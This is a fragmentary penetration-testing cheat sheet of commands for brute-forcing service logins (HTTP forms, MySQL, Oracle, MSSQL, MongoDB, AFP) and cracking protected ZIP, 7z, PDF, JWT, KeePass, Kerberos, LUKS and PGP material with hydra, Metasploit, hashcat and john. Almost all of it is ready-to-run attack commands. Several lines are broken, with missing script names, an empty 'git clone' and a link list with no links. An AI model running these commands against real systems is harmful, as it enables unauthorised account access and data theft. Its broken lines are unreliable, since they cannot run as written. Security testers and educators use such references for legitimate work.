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Default Credentials
Search in google for default credentials of the technology that is being used, or try this links:
nmap -p 548 --script afp-brute <IP>
msf> use auxiliary/scanner/afp/afp_login
msf> set BLANK_PASSWORDS true
msf> set USER_AS_PASS true
msf> run
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
# Use https-post-form mode for httpS
For https you have to change from "http-post-form" to "https-post-form"
HTTP - CMS -- (W)ordpress, (J)oomla or (D)rupal or (M)oodle
nmap -sV --script mongodb-brute -n -p 27017 <IP>
use auxiliary/scanner/mongodb/mongodb_login
hydra -L usernames.txt -P pass.txt <IP> mysql
msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
./ passwordguesser -s $SERVER -d $SID
./ passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt
msf> use admin/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORT 1521
msf> set SID <SID>
#msf2, this option uses nmap and it fails sometimes for some reason
msf> use scanner/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORTS 1521
msf> set SID <SID>
#nmap fails sometimes for some reson executing this script
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>
In order to use oracle_login with patator you need to install:
#Use the NetBIOS name of the machine as domain
crackmapexec mssql <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> mssql
medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mssql
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed. Be carefull with the number of password in the list, this could block accounts
msf> use auxiliary/scanner/mssql/mssql_login #Be carefull, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT
hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt
.\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attack
cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z
#Download and install requirements for 7z2john
apt-get install libcompress-raw-lzma-perl
./ file.7z > 7zhash.john
apt-get install pdfcrack
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
#pdf2john didnt worked well, john didnt know which hash type was
# To permanently decrypt the pdf
sudo apt-get install qpdf
qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf
git clone
cd jwtcrack
#Bruteforce using
python eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
#Bruteforce using john
python eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
john jwt.john #It does not work with Kali-John
sudo apt-get install -y kpcli #Install keepass tools like keepass2john
keepass2john file.kdbx > hash #The keepass is only using password
keepass2john -k <file-password> file.kdbx > hash # The keepas is also using a file as a needed credential
#The keepass can use password and/or a file as credentials, if it is using both you need to provide them to keepass2john
john --wordlist=/usr/share/wordlists/rockyou.txt hash
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./ wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
bruteforce-luks -f ./list.txt ./backup.img
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt
Method 2
cryptsetup luksDump backup.img #Check that the payload offset is set to 4096
dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1
hashcat -m 14600 -a 0 luckshash wordlists/rockyou.txt
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt
#John hash format
PGP/GPG Private key
gpg2john private_pgp.key #This will generate the hash, save it in a file
john --wordlist=/usr/share/wordlists/rockyou.txt ./hash